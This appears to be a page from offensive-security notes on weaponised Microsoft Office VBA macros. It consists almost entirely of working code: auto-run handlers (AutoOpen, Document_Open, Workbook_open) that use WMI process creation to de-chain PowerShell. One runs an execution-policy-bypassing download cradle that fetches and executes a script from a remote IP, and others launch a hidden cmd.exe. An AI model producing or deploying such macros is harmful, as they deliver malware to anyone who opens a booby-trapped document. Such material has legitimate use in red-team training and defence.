⌘Ctrlk

Macro

WMI process creation to de-chain the PowerShell process.

Sub MyMacro()
  strArg = "powershell"
  GetObject("winmgmts:").Get("Win32_Process").Create strArg, Null, Null, pid
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Using the PowerShell shellcode runner

We can update the PowerShell argument for the Create method to include the entire download cradle and dechaining with WMI.

Simple Macro

PreviousJScript Dropper NextMetasploit

Last updated 1 year ago

Sub MyMacro
  strArg = "powershell -exec bypass -nop -c iex((new-object system.net.webclient).downloadstring('http://192.168.19.134/run.txt'))"
  GetObject("winmgmts:").Get("Win32_Process").Create strArg, Null, Null, pid
End Sub

Sub AutoOpen()
    Mymacro
End Sub

'Word Document
Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "cmd.exe"
    Shell str, vbHide
End Sub

'Excel Document
Sub Workbook_open()
    MyMacro
End Sub

Private Sub Auto_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "cmd.exe"
    CreateObject("Wscript.Shell").Run str, 0
End Sub